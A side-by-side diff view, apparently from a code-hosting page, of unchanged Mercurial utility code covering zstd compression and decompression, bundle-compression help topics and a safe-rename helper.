3755 if len(compressed) < insize:
3760 if len(compressed) < insize:
3756 return compressed
3761 return compressed
3757 return None
3762 return None
3758 else:
3763 else:
3759 z = self._cctx.compressobj()
3764 z = self._cctx.compressobj()
3760 chunks = []
3765 chunks = []
3761 pos = 0
3766 pos = 0
3762 while pos < insize:
3767 while pos < insize:
3763 pos2 = pos + self._compinsize
3768 pos2 = pos + self._compinsize
3764 chunk = z.compress(data[pos:pos2])
3769 chunk = z.compress(data[pos:pos2])
3765 if chunk:
3770 if chunk:
3766 chunks.append(chunk)
3771 chunks.append(chunk)
3767 pos = pos2
3772 pos = pos2
3768 chunks.append(z.flush())
3773 chunks.append(z.flush())
3769
3774
3770 if sum(map(len, chunks)) < insize:
3775 if sum(map(len, chunks)) < insize:
3771 return ''.join(chunks)
3776 return ''.join(chunks)
3772 return None
3777 return None
3773
3778
3774 def decompress(self, data):
3779 def decompress(self, data):
3775 insize = len(data)
3780 insize = len(data)
3776
3781
3777 try:
3782 try:
3778 # This was measured to be faster than other streaming
3783 # This was measured to be faster than other streaming
3779 # decompressors.
3784 # decompressors.
3780 dobj = self._dctx.decompressobj()
3785 dobj = self._dctx.decompressobj()
3781 chunks = []
3786 chunks = []
3782 pos = 0
3787 pos = 0
3783 while pos < insize:
3788 while pos < insize:
3784 pos2 = pos + self._decompinsize
3789 pos2 = pos + self._decompinsize
3785 chunk = dobj.decompress(data[pos:pos2])
3790 chunk = dobj.decompress(data[pos:pos2])
3786 if chunk:
3791 if chunk:
3787 chunks.append(chunk)
3792 chunks.append(chunk)
3788 pos = pos2
3793 pos = pos2
3789 # Frame should be exhausted, so no finish() API.
3794 # Frame should be exhausted, so no finish() API.
3790
3795
3791 return ''.join(chunks)
3796 return ''.join(chunks)
3792 except Exception as e:
3797 except Exception as e:
3793 raise error.RevlogError(_('revlog decompress error: %s') %
3798 raise error.RevlogError(_('revlog decompress error: %s') %
3794 str(e))
3799 str(e))
3795
3800
3796 def revlogcompressor(self, opts=None):
3801 def revlogcompressor(self, opts=None):
3797 opts = opts or {}
3802 opts = opts or {}
3798 return self.zstdrevlogcompressor(self._module,
3803 return self.zstdrevlogcompressor(self._module,
3799 level=opts.get('level', 3))
3804 level=opts.get('level', 3))
3800
3805
3801 compengines.register(_zstdengine())
3806 compengines.register(_zstdengine())
3802
3807
3803 def bundlecompressiontopics():
3808 def bundlecompressiontopics():
3804 """Obtains a list of available bundle compressions for use in help."""
3809 """Obtains a list of available bundle compressions for use in help."""
3805 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3810 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3806 items = {}
3811 items = {}
3807
3812
3808 # We need to format the docstring. So use a dummy object/type to hold it
3813 # We need to format the docstring. So use a dummy object/type to hold it
3809 # rather than mutating the original.
3814 # rather than mutating the original.
3810 class docobject(object):
3815 class docobject(object):
3811 pass
3816 pass
3812
3817
3813 for name in compengines:
3818 for name in compengines:
3814 engine = compengines[name]
3819 engine = compengines[name]
3815
3820
3816 if not engine.available():
3821 if not engine.available():
3817 continue
3822 continue
3818
3823
3819 bt = engine.bundletype()
3824 bt = engine.bundletype()
3820 if not bt or not bt[0]:
3825 if not bt or not bt[0]:
3821 continue
3826 continue
3822
3827
3823 doc = pycompat.sysstr('``%s``\n %s') % (
3828 doc = pycompat.sysstr('``%s``\n %s') % (
3824 bt[0], engine.bundletype.__doc__)
3829 bt[0], engine.bundletype.__doc__)
3825
3830
3826 value = docobject()
3831 value = docobject()
3827 value.__doc__ = doc
3832 value.__doc__ = doc
3828 value._origdoc = engine.bundletype.__doc__
3833 value._origdoc = engine.bundletype.__doc__
3829 value._origfunc = engine.bundletype
3834 value._origfunc = engine.bundletype
3830
3835
3831 items[bt[0]] = value
3836 items[bt[0]] = value
3832
3837
3833 return items
3838 return items
3834
3839
3835 i18nfunctions = bundlecompressiontopics().values()
3840 i18nfunctions = bundlecompressiontopics().values()
3836
3841
3837 # convenient shortcut
3842 # convenient shortcut
3838 dst = debugstacktrace
3843 dst = debugstacktrace
3839
3844
3840 def safename(f, tag, ctx, others=None):
3845 def safename(f, tag, ctx, others=None):
3841 """
3846 """
3842 Generate a name that it is safe to rename f to in the given context.
3847 Generate a name that it is safe to rename f to in the given context.
3843
3848
3844 f: filename to rename
3849 f: filename to rename
3845 tag: a string tag that will be included in the new name
3850 tag: a string tag that will be included in the new name
3846 ctx: a context, in which the new name must not exist
3851 ctx: a context, in which the new name must not exist
3847 others: a set of other filenames that the new name must not be in
3852 others: a set of other filenames that the new name must not be in
3848
3853
3849 Returns a file name of the form oldname~tag[~number] which does not exist
3854 Returns a file name of the form oldname~tag[~number] which does not exist
3850 in the provided context and is not in the set of other names.
3855 in the provided context and is not in the set of other names.
3851 """
3856 """
3852 if others is None:
3857 if others is None:
3853 others = set()
3858 others = set()
3854
3859
3855 fn = '%s~%s' % (f, tag)
3860 fn = '%s~%s' % (f, tag)
3856 if fn not in ctx and fn not in others:
3861 if fn not in ctx and fn not in others:
3857 return fn
3862 return fn
3858 for n in itertools.count(1):
3863 for n in itertools.count(1):
3859 fn = '%s~%s~%s' % (f, tag, n)
3864 fn = '%s~%s~%s' % (f, tag, n)
3860 if fn not in ctx and fn not in others:
3865 if fn not in ctx and fn not in others:
3861 return fn
3866 return fn
General Comments 0
You need to be logged in to leave comments. Login now